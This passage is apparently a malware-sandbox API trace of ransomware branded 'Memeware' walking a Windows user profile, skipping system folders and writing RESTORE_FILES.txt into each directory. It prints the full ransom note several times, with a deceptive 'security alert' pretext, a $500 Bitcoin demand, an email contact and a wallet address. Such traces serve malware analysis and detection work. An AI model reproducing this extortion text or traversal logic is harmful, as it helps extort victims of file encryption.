lpString2="$Recycle.bin") returned 1 [0087.434] lstrcmpiW (lpString1="spn", lpString2="System Volume Information") returned -1 [0087.434] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\spn") returned 109 [0087.434] lstrcmpW (lpString1="spn", lpString2=".") returned 1 [0087.434] lstrcmpW (lpString1="spn", lpString2="..") returned 1 [0087.434] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\spn\\*") returned 111 [0087.434] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\spn\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0087.434] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.434] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0087.434] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0087.434] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.434] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.434] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\spn\\.") returned 111 [0087.434] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.434] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0087.434] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.434] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0087.434] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0087.434] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.434] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.434] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\spn\\..") returned 112 [0087.434] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.434] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.434] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: 
lpFindFileData=0x295e2f0) returned 0 [0087.435] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0087.435] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\spn\\RESTORE_FILES.txt") returned 127 [0087.435] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\spn\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\spn\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0087.435] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0087.436] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0087.436] lstrlenA (lpString="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") returned 684 [0087.436] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0087.436] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0087.436] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, 
lpOverlapped=0x0) returned 1 [0087.437] CloseHandle (hObject=0x154) returned 1 [0087.437] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0087.437] lstrcmpiW (lpString1="swd", lpString2="Windows") returned -1 [0087.437] lstrcmpiW (lpString1="swd", lpString2="Program Files") returned 1 [0087.437] lstrcmpiW (lpString1="swd", lpString2="Program Files (x86)") returned 1 [0087.437] lstrcmpiW (lpString1="swd", lpString2="$Recycle.bin") returned 1 [0087.437] lstrcmpiW (lpString1="swd", lpString2="System Volume Information") returned -1 [0087.437] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\swd") returned 109 [0087.437] lstrcmpW (lpString1="swd", lpString2=".") returned 1 [0087.437] lstrcmpW (lpString1="swd", lpString2="..") returned 1 [0087.437] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\swd\\*") returned 111 [0087.437] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\swd\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0087.437] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.437] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0087.437] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0087.437] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.437] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.437] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\swd\\.") returned 111 [0087.438] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.438] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0087.438] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.438] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0087.438] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0087.438] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.438] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.438] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\swd\\..") returned 112 [0087.438] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.438] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.438] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0087.438] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0087.438] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\swd\\RESTORE_FILES.txt") returned 127 [0087.438] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\swd\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\swd\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0087.439] 
lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0087.439] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0087.441] lstrlenA (lpString="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") returned 684 [0087.441] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, 
lpOverlapped=0x0) returned 1 [0087.441] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0087.441] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0087.441] CloseHandle (hObject=0x154) returned 1 [0087.441] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0087.441] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0087.441] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\RESTORE_FILES.txt") returned 123 [0087.441] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0087.442] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0087.442] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0087.443] lstrlenA (lpString="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") returned 684 [0087.443] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0087.444] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0087.444] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, 
lpOverlapped=0x0) returned 1 [0087.444] CloseHandle (hObject=0x150) returned 1 [0087.444] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0087.444] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0087.444] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\RESTORE_FILES.txt") returned 99 [0087.444] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0087.445] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0087.445] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0087.446] lstrlenA (lpString="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") returned 684 [0087.446] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0087.446] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0087.446] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, 
lpOverlapped=0x0) returned 1 [0087.446] CloseHandle (hObject=0x14c) returned 1 [0087.448] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0087.448] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0087.448] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\RESTORE_FILES.txt") returned 86 [0087.448] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0087.449] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0087.449] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0087.450] lstrlenA (lpString="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") returned 684 [0087.450] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0087.450] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0087.450] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, 
lpOverlapped=0x0) returned 1 [0087.450] CloseHandle (hObject=0xd8) returned 1 [0087.451] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0087.451] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0087.451] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\RESTORE_FILES.txt") returned 74 [0087.451] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0087.453] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0087.453] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0087.454] lstrlenA (lpString="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") returned 684 [0087.454] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0087.454] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0087.454] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, 
lpOverlapped=0x0) returned 1 [0087.454] CloseHandle (hObject=0xd4) returned 1 [0087.455] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0087.455] lstrcmpiW (lpString1="Microsoft", lpString2="Windows") returned -1 [0087.455] lstrcmpiW (lpString1="Microsoft", lpString2="Program Files") returned -1 [0087.455] lstrcmpiW (lpString1="Microsoft", lpString2="Program Files (x86)") returned -1 [0087.455] lstrcmpiW (lpString1="Microsoft", lpString2="$Recycle.bin") returned 1 [0087.455] lstrcmpiW (lpString1="Microsoft", lpString2="System Volume Information") returned -1 [0087.455] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft") returned 60 [0087.455] lstrcmpW (lpString1="Microsoft", lpString2=".") returned 1 [0087.455] lstrcmpW (lpString1="Microsoft", lpString2="..") returned 1 [0087.455] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\*") returned 62 [0087.455] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0087.455] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.455] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0087.455] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0087.455] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.455] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.455] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\.") returned 62 [0087.455] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.455] StrStrIW (lpFirst=".", lpSrch=".protected") 
